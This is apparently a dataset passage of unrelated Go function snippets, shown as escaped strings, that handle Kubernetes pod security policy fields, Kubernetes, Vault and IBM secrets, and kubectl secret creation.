&ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_DefaultCapabilities{}\n\t\t\t\tdefaultCapabilitiesChoiceInt.DefaultCapabilities = &ves_io_schema_k8s_pod_security_policy.CapabilityListType{}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.DefaultCapabilitiesChoice = defaultCapabilitiesChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"capabilities\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t\t\t}\n\t\t\t\t\t\tdefaultCapabilitiesChoiceInt.DefaultCapabilities.Capabilities = ls\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"no_default_capabilities\"]; ok && !isIntfNil(v) && !defaultCapabilitiesChoiceTypeFound {\n\n\t\t\t\tdefaultCapabilitiesChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tdefaultCapabilitiesChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_NoDefaultCapabilities{}\n\t\t\t\t\tdefaultCapabilitiesChoiceInt.NoDefaultCapabilities = &ves_io_schema.Empty{}\n\t\t\t\t\tconfigMethodChoiceInt.PspSpec.DefaultCapabilitiesChoice = defaultCapabilitiesChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tdropCapabilitiesChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"drop_capabilities\"]; ok && !isIntfNil(v) && !dropCapabilitiesChoiceTypeFound {\n\n\t\t\t\tdropCapabilitiesChoiceTypeFound = true\n\t\t\t\tdropCapabilitiesChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_DropCapabilities{}\n\t\t\t\tdropCapabilitiesChoiceInt.DropCapabilities = &ves_io_schema_k8s_pod_security_policy.CapabilityListType{}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.DropCapabilitiesChoice = dropCapabilitiesChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"capabilities\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t\t\t}\n\t\t\t\t\t\tdropCapabilitiesChoiceInt.DropCapabilities.Capabilities = ls\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"no_drop_capabilities\"]; ok && !isIntfNil(v) && !dropCapabilitiesChoiceTypeFound {\n\n\t\t\t\tdropCapabilitiesChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tdropCapabilitiesChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_NoDropCapabilities{}\n\t\t\t\t\tdropCapabilitiesChoiceInt.NoDropCapabilities = &ves_io_schema.Empty{}\n\t\t\t\t\tconfigMethodChoiceInt.PspSpec.DropCapabilitiesChoice = dropCapabilitiesChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"forbidden_sysctls\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.ForbiddenSysctls = ls\n\n\t\t\t}\n\n\t\t\tfsGroupChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"fs_group_strategy_options\"]; ok && !isIntfNil(v) && !fsGroupChoiceTypeFound {\n\n\t\t\t\tfsGroupChoiceTypeFound = true\n\t\t\t\tfsGroupChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_FsGroupStrategyOptions{}\n\t\t\t\tfsGroupChoiceInt.FsGroupStrategyOptions = &ves_io_schema_k8s_pod_security_policy.IDStrategyOptionsType{}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.FsGroupChoice = fsGroupChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"id_ranges\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tsl := v.([]interface{})\n\t\t\t\t\t\tidRanges := make([]*ves_io_schema_k8s_pod_security_policy.IDRangeType, len(sl))\n\t\t\t\t\t\tfsGroupChoiceInt.FsGroupStrategyOptions.IdRanges = idRanges\n\t\t\t\t\t\tfor i, set := range sl {\n\t\t\t\t\t\t\tidRanges[i] = &ves_io_schema_k8s_pod_security_policy.IDRangeType{}\n\t\t\t\t\t\t\tidRangesMapStrToI := set.(map[string]interface{})\n\n\t\t\t\t\t\t\tif w, ok := idRangesMapStrToI[\"max_id\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\t\t\tidRanges[i].MaxId = uint32(w.(int))\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif w, ok := idRangesMapStrToI[\"min_id\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\t\t\tidRanges[i].MinId = uint32(w.(int))\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"rule\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tfsGroupChoiceInt.FsGroupStrategyOptions.Rule = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"no_fs_groups\"]; ok && !isIntfNil(v) && !fsGroupChoiceTypeFound {\n\n\t\t\t\tfsGroupChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tfsGroupChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_NoFsGroups{}\n\t\t\t\t\tfsGroupChoiceInt.NoFsGroups = &ves_io_schema.Empty{}\n\t\t\t\t\tconfigMethodChoiceInt.PspSpec.FsGroupChoice = fsGroupChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tgroupChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"no_run_as_group\"]; ok && !isIntfNil(v) && !groupChoiceTypeFound {\n\n\t\t\t\tgroupChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tgroupChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_NoRunAsGroup{}\n\t\t\t\t\tgroupChoiceInt.NoRunAsGroup = &ves_io_schema.Empty{}\n\t\t\t\t\tconfigMethodChoiceInt.PspSpec.GroupChoice = groupChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"run_as_group\"]; ok && !isIntfNil(v) && !groupChoiceTypeFound {\n\n\t\t\t\tgroupChoiceTypeFound = true\n\t\t\t\tgroupChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_RunAsGroup{}\n\t\t\t\tgroupChoiceInt.RunAsGroup = &ves_io_schema_k8s_pod_security_policy.IDStrategyOptionsType{}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.GroupChoice = groupChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"id_ranges\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tsl := v.([]interface{})\n\t\t\t\t\t\tidRanges := make([]*ves_io_schema_k8s_pod_security_policy.IDRangeType, len(sl))\n\t\t\t\t\t\tgroupChoiceInt.RunAsGroup.IdRanges = idRanges\n\t\t\t\t\t\tfor i, set := range sl {\n\t\t\t\t\t\t\tidRanges[i] = &ves_io_schema_k8s_pod_security_policy.IDRangeType{}\n\t\t\t\t\t\t\tidRangesMapStrToI := set.(map[string]interface{})\n\n\t\t\t\t\t\t\tif w, ok := idRangesMapStrToI[\"max_id\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\t\t\tidRanges[i].MaxId = uint32(w.(int))\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif w, ok := idRangesMapStrToI[\"min_id\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\t\t\tidRanges[i].MinId = uint32(w.(int))\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"rule\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tgroupChoiceInt.RunAsGroup.Rule = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"host_ipc\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tconfigMethodChoiceInt.PspSpec.HostIpc = v.(bool)\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"host_network\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tconfigMethodChoiceInt.PspSpec.HostNetwork = v.(bool)\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"host_pid\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tconfigMethodChoiceInt.PspSpec.HostPid = v.(bool)\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"host_port_ranges\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tconfigMethodChoiceInt.PspSpec.HostPortRanges = v.(string)\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"privileged\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tconfigMethodChoiceInt.PspSpec.Privileged = v.(bool)\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"read_only_root_filesystem\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tconfigMethodChoiceInt.PspSpec.ReadOnlyRootFilesystem = v.(bool)\n\n\t\t\t}\n\n\t\t\truntimeClassChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"no_runtime_class\"]; ok && !isIntfNil(v) && !runtimeClassChoiceTypeFound {\n\n\t\t\t\truntimeClassChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\truntimeClassChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_NoRuntimeClass{}\n\t\t\t\t\truntimeClassChoiceInt.NoRuntimeClass = &ves_io_schema.Empty{}\n\t\t\t\t\tconfigMethodChoiceInt.PspSpec.RuntimeClassChoice = runtimeClassChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"runtime_class\"]; ok && !isIntfNil(v) && !runtimeClassChoiceTypeFound {\n\n\t\t\t\truntimeClassChoiceTypeFound = true\n\t\t\t\truntimeClassChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_RuntimeClass{}\n\t\t\t\truntimeClassChoiceInt.RuntimeClass = &ves_io_schema_k8s_pod_security_policy.RuntimeClassStrategyOptions{}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.RuntimeClassChoice = runtimeClassChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"allowed_runtime_class_names\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t\t\t}\n\t\t\t\t\t\truntimeClassChoiceInt.RuntimeClass.AllowedRuntimeClassNames = ls\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"default_runtime_class_name\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\truntimeClassChoiceInt.RuntimeClass.DefaultRuntimeClassName = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tseLinuxChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"no_se_linux_options\"]; ok && !isIntfNil(v) && !seLinuxChoiceTypeFound {\n\n\t\t\t\tseLinuxChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tseLinuxChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_NoSeLinuxOptions{}\n\t\t\t\t\tseLinuxChoiceInt.NoSeLinuxOptions = &ves_io_schema.Empty{}\n\t\t\t\t\tconfigMethodChoiceInt.PspSpec.SeLinuxChoice = seLinuxChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"se_linux_options\"]; ok && !isIntfNil(v) && !seLinuxChoiceTypeFound {\n\n\t\t\t\tseLinuxChoiceTypeFound = true\n\t\t\t\tseLinuxChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_SeLinuxOptions{}\n\t\t\t\tseLinuxChoiceInt.SeLinuxOptions = &ves_io_schema_k8s_pod_security_policy.SELinuxStrategyOptions{}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.SeLinuxChoice = seLinuxChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"level\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tseLinuxChoiceInt.SeLinuxOptions.Level = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"role\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tseLinuxChoiceInt.SeLinuxOptions.Role = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"rule\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tseLinuxChoiceInt.SeLinuxOptions.Rule = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"type\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tseLinuxChoiceInt.SeLinuxOptions.Type = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"user\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tseLinuxChoiceInt.SeLinuxOptions.User = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tsupplementalGroupChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"no_supplemental_groups\"]; ok && !isIntfNil(v) && !supplementalGroupChoiceTypeFound {\n\n\t\t\t\tsupplementalGroupChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tsupplementalGroupChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_NoSupplementalGroups{}\n\t\t\t\t\tsupplementalGroupChoiceInt.NoSupplementalGroups = &ves_io_schema.Empty{}\n\t\t\t\t\tconfigMethodChoiceInt.PspSpec.SupplementalGroupChoice = supplementalGroupChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"supplemental_groups\"]; ok && !isIntfNil(v) && !supplementalGroupChoiceTypeFound {\n\n\t\t\t\tsupplementalGroupChoiceTypeFound = true\n\t\t\t\tsupplementalGroupChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_SupplementalGroups{}\n\t\t\t\tsupplementalGroupChoiceInt.SupplementalGroups = &ves_io_schema_k8s_pod_security_policy.IDStrategyOptionsType{}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.SupplementalGroupChoice = supplementalGroupChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"id_ranges\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tsl := v.([]interface{})\n\t\t\t\t\t\tidRanges := make([]*ves_io_schema_k8s_pod_security_policy.IDRangeType, len(sl))\n\t\t\t\t\t\tsupplementalGroupChoiceInt.SupplementalGroups.IdRanges = idRanges\n\t\t\t\t\t\tfor i, set := range sl {\n\t\t\t\t\t\t\tidRanges[i] = &ves_io_schema_k8s_pod_security_policy.IDRangeType{}\n\t\t\t\t\t\t\tidRangesMapStrToI := set.(map[string]interface{})\n\n\t\t\t\t\t\t\tif w, ok := idRangesMapStrToI[\"max_id\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\t\t\tidRanges[i].MaxId = uint32(w.(int))\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif w, ok := idRangesMapStrToI[\"min_id\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\t\t\tidRanges[i].MinId = uint32(w.(int))\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"rule\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tsupplementalGroupChoiceInt.SupplementalGroups.Rule = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tuserChoiceTypeFound := false\n\n\t\t\tif v, ok := cs[\"no_run_as_user\"]; ok && !isIntfNil(v) && !userChoiceTypeFound {\n\n\t\t\t\tuserChoiceTypeFound = true\n\n\t\t\t\tif v.(bool) {\n\t\t\t\t\tuserChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_NoRunAsUser{}\n\t\t\t\t\tuserChoiceInt.NoRunAsUser = &ves_io_schema.Empty{}\n\t\t\t\t\tconfigMethodChoiceInt.PspSpec.UserChoice = userChoiceInt\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"run_as_user\"]; ok && !isIntfNil(v) && !userChoiceTypeFound {\n\n\t\t\t\tuserChoiceTypeFound = true\n\t\t\t\tuserChoiceInt := &ves_io_schema_k8s_pod_security_policy.PodSecurityPolicySpecType_RunAsUser{}\n\t\t\t\tuserChoiceInt.RunAsUser = &ves_io_schema_k8s_pod_security_policy.IDStrategyOptionsType{}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.UserChoice = userChoiceInt\n\n\t\t\t\tsl := v.(*schema.Set).List()\n\t\t\t\tfor _, set := range sl {\n\t\t\t\t\tcs := set.(map[string]interface{})\n\n\t\t\t\t\tif v, ok := cs[\"id_ranges\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tsl := v.([]interface{})\n\t\t\t\t\t\tidRanges := make([]*ves_io_schema_k8s_pod_security_policy.IDRangeType, len(sl))\n\t\t\t\t\t\tuserChoiceInt.RunAsUser.IdRanges = idRanges\n\t\t\t\t\t\tfor i, set := range sl {\n\t\t\t\t\t\t\tidRanges[i] = &ves_io_schema_k8s_pod_security_policy.IDRangeType{}\n\t\t\t\t\t\t\tidRangesMapStrToI := set.(map[string]interface{})\n\n\t\t\t\t\t\t\tif w, ok := idRangesMapStrToI[\"max_id\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\t\t\tidRanges[i].MaxId = uint32(w.(int))\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\tif w, ok := idRangesMapStrToI[\"min_id\"]; ok && !isIntfNil(w) {\n\t\t\t\t\t\t\t\tidRanges[i].MinId = uint32(w.(int))\n\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\n\t\t\t\t\tif v, ok := cs[\"rule\"]; ok && !isIntfNil(v) {\n\n\t\t\t\t\t\tuserChoiceInt.RunAsUser.Rule = v.(string)\n\n\t\t\t\t\t}\n\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t\tif v, ok := cs[\"volumes\"]; ok && !isIntfNil(v) {\n\n\t\t\t\tls := make([]string, len(v.([]interface{})))\n\t\t\t\tfor i, v := range v.([]interface{}) {\n\t\t\t\t\tls[i] = v.(string)\n\t\t\t\t}\n\t\t\t\tconfigMethodChoiceInt.PspSpec.Volumes = ls\n\n\t\t\t}\n\n\t\t}\n\n\t}\n\n\tif v, ok := d.GetOk(\"yaml\"); ok && !configMethodChoiceTypeFound {\n\n\t\tconfigMethodChoiceTypeFound = true\n\t\tconfigMethodChoiceInt := &ves_io_schema_k8s_pod_security_policy.CreateSpecType_Yaml{}\n\n\t\tcreateSpec.ConfigMethodChoice = configMethodChoiceInt\n\n\t\tconfigMethodChoiceInt.Yaml = v.(string)\n\n\t}\n\n\tlog.Printf(\"[DEBUG] Creating Volterra K8SPodSecurityPolicy object with struct: %+v\", createReq)\n\n\tcreateK8SPodSecurityPolicyResp, err := client.CreateObject(context.Background(), ves_io_schema_k8s_pod_security_policy.ObjectType, createReq)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"error creating K8SPodSecurityPolicy: %s\", err)\n\t}\n\td.SetId(createK8SPodSecurityPolicyResp.GetObjSystemMetadata().GetUid())\n\n\treturn resourceVolterraK8SPodSecurityPolicyRead(d, meta)\n}", "func TestCreateSecretWithDataFromRawBytes(t *testing.T) {\n\tt.Parallel()\n\n\tttKubectlOptions, kubectlOptions := GetKubectlOptions(t)\n\n\t// Create a namespace so we don't collide with other tests\n\tnamespace := strings.ToLower(random.UniqueId())\n\tk8s.CreateNamespace(t, ttKubectlOptions, namespace)\n\tdefer k8s.DeleteNamespace(t, ttKubectlOptions, namespace)\n\n\t// Create a dummy secret from a random tmp file\n\tcontents := random.UniqueId()\n\tsecret := PrepareSecret(\n\t\tnamespace,\n\t\t\"secret-for-test\",\n\t\tmap[string]string{},\n\t\tmap[string]string{},\n\t)\n\tAddToSecretFromData(secret, \"data\", []byte(contents))\n\trequire.NoError(t, CreateSecret(kubectlOptions, secret))\n\n\t// Now verify the secret was actually created on the cluster.\n\t// We use the terratest secret lib instead of the one in kubectl.\n\tttKubectlOptions.Namespace = namespace\n\tstoredSecret := k8s.GetSecret(t, ttKubectlOptions, \"secret-for-test\")\n\tassert.Equal(t, string(storedSecret.Data[\"data\"]), contents)\n}", "func (o FunctionServiceConfigSecretEnvironmentVariableOutput) Secret() pulumi.StringOutput {\n\treturn o.ApplyT(func(v FunctionServiceConfigSecretEnvironmentVariable) string { return v.Secret }).(pulumi.StringOutput)\n}", "func (w *StandardClientWrapper) ReadSecret(path, key string) (interface{}, error) {\n\tsecret, err := w.Client.Logical().Read(path)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to read secret: %v\", err)\n\t}\n\tif secret == nil || secret.Data == nil {\n\t\treturn nil, nil\n\t}\n\n\t// Determine if this KV secret is version 1 or 2\n\t//\n\t// In version 1, the secret is stored directly under\n\t// secret[key].\n\t//\n\t// In version 2, the secret is stored\n\t// as secret[\"data\"][key]. There are also values\n\t// under secret[\"metadata\"] that have information\n\t// we can use to confirm the secret type, such as\n\t// secret[\"metadata\"][\"version\"]\n\t//\n\t// TODO(donald): Is there a better way to differentiate\n\t// between v1 and v2 secrets?\n\tif secret.Data[\"metadata\"] != nil && secret.Data[\"data\"] != nil {\n\t\tmd, mdok := secret.Data[\"metadata\"].(map[string]interface{})\n\t\tkv, kvok := secret.Data[\"data\"].(map[string]interface{})\n\t\tif !mdok || !kvok || md[\"version\"] == nil {\n\t\t\t// treat this as a v1 secret\n\t\t\treturn secret.Data[key], nil\n\t\t}\n\t\t// treat this as a v2 secret\n\t\treturn kv[key], nil\n\t}\n\n\treturn secret.Data[key], nil\n}", "func Create(ctx context.Context, dev *model.Dev, c *kubernetes.Clientset, s *syncthing.Syncthing) error {\n\tsecretName := GetSecretName(dev)\n\n\tsct, err := Get(ctx, secretName, dev.Namespace, c)\n\tif err != nil && !strings.Contains(err.Error(), \"not found\") {\n\t\treturn fmt.Errorf(\"error getting kubernetes secret: %s\", err)\n\t}\n\n\tconfig, err := getConfigXML(s)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"error generating syncthing configuration: %s\", err)\n\t}\n\tdata := &v1.Secret{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tName: secretName,\n\t\t\tLabels: map[string]string{\n\t\t\t\tconstants.DevLabel: \"true\",\n\t\t\t},\n\t\t},\n\t\tType: v1.SecretTypeOpaque,\n\t\tData: map[string][]byte{\n\t\t\t\"config.xml\": config,\n\t\t\t\"cert.pem\": []byte(certPEM),\n\t\t\t\"key.pem\": []byte(keyPEM),\n\t\t},\n\t}\n\n\tidx := 0\n\tfor _, s := range dev.Secrets {\n\t\tcontent, err := os.ReadFile(s.LocalPath)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"error reading secret '%s': %s\", s.LocalPath, err)\n\t\t}\n\t\tif strings.Contains(s.GetKeyName(), \"stignore\") {\n\t\t\tidx++\n\t\t\tdata.Data[fmt.Sprintf(\"%s-%d\", s.GetKeyName(), idx)] = content\n\t\t} else {\n\t\t\tdata.Data[s.GetKeyName()] = content\n\t\t}\n\n\t}\n\n\tif sct.Name == \"\" {\n\t\t_, err := c.CoreV1().Secrets(dev.Namespace).Create(ctx, data, metav1.CreateOptions{})\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"error creating kubernetes sync secret: %s\", err)\n\t\t}\n\n\t\toktetoLog.Infof(\"created okteto secret '%s'\", secretName)\n\t} else {\n\t\t_, err := c.CoreV1().Secrets(dev.Namespace).Update(ctx, data, metav1.UpdateOptions{})\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"error updating kubernetes okteto secret: %s\", err)\n\t\t}\n\t\toktetoLog.Infof(\"updated okteto secret '%s'\", secretName)\n\t}\n\treturn nil\n}", "func CreateSecretGeneric(f cmdutil.Factory, cmdOut io.Writer, cmd *cobra.Command, args []string) error {\n\tname, err := NameFromCommandArgs(cmd, args)\n\tif err != nil {\n\t\treturn err\n\t}\n\tvar generator kubectl.StructuredGenerator\n\tswitch generatorName := cmdutil.GetFlagString(cmd, \"generator\"); generatorName {\n\tcase cmdutil.SecretV1GeneratorName:\n\t\tgenerator = &kubectl.SecretGeneratorV1{\n\t\t\tName: name,\n\t\t\tType: cmdutil.GetFlagString(cmd, \"type\"),\n\t\t\tFileSources: cmdutil.GetFlagStringSlice(cmd, \"from-file\"),\n\t\t\tLiteralSources: cmdutil.GetFlagStringArray(cmd, \"from-literal\"),\n\t\t\tEnvFileSource: cmdutil.GetFlagString(cmd, \"from-env-file\"),\n\t\t}\n\tdefault:\n\t\treturn cmdutil.UsageError(cmd, fmt.Sprintf(\"Generator: %s not supported.\", generatorName))\n\t}\n\treturn RunCreateSubcommand(f, cmd, cmdOut, &CreateSubcommandOptions{\n\t\tName: name,\n\t\tStructuredGenerator: generator,\n\t\tDryRun: cmdutil.GetDryRunFlag(cmd),\n\t\tOutputFormat: cmdutil.GetFlagString(cmd, \"output\"),\n\t})\n}", "func NeedsResourceVersionUpdate(kind string) bool {\n\tif kind == \"SecurityContextConstraints\" ||\n\t\tkind == \"Service\" ||\n\t\tkind == \"ServiceMonitor\" ||\n\t\tkind == \"Route\" ||\n\t\tkind == \"Build\" ||\n\t\tkind == \"BuildRun\" ||\n\t\tkind == \"BuildConfig\" ||\n\t\tkind == \"ImageStream\" ||\n\t\tkind == \"PrometheusRule\" ||\n\t\tkind == \"CSIDriver\" ||\n\t\tkind == \"Issuer\" ||\n\t\tkind == \"CustomResourceDefinition\" ||\n\t\tkind == \"Certificate\" ||\n\t\tkind == \"SpecialResource\" ||\n\t\tkind == \"OperatorGroup\" ||\n\t\tkind == \"CertManager\" ||\n\t\tkind == \"MutatingWebhookConfiguration\" ||\n\t\tkind == \"ValidatingWebhookConfiguration\" ||\n\t\tkind == \"Deployment\" ||\n\t\tkind == \"ImagePolicy\" {\n\t\treturn true\n\t}\n\treturn false\n\n}", "func UnmarshalKVSecretMetadata(m map[string]json.RawMessage, result interface{}) (err error) {\n\tobj := new(KVSecretMetadata)\n\terr = core.UnmarshalPrimitive(m, \"created_by\", &obj.CreatedBy)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"created_at\", &obj.CreatedAt)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"crn\", &obj.Crn)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"custom_metadata\", &obj.CustomMetadata)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"description\", &obj.Description)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"downloaded\", &obj.Downloaded)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"id\", &obj.ID)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"labels\", &obj.Labels)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"locks_total\", &obj.LocksTotal)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"name\", &obj.Name)\n\tif err != nil {\n\t\treturn\n\t}\n\terr = core.UnmarshalPrimitive(m, \"secret_group_id\", &obj.SecretGroupID)\n\tif err != nil 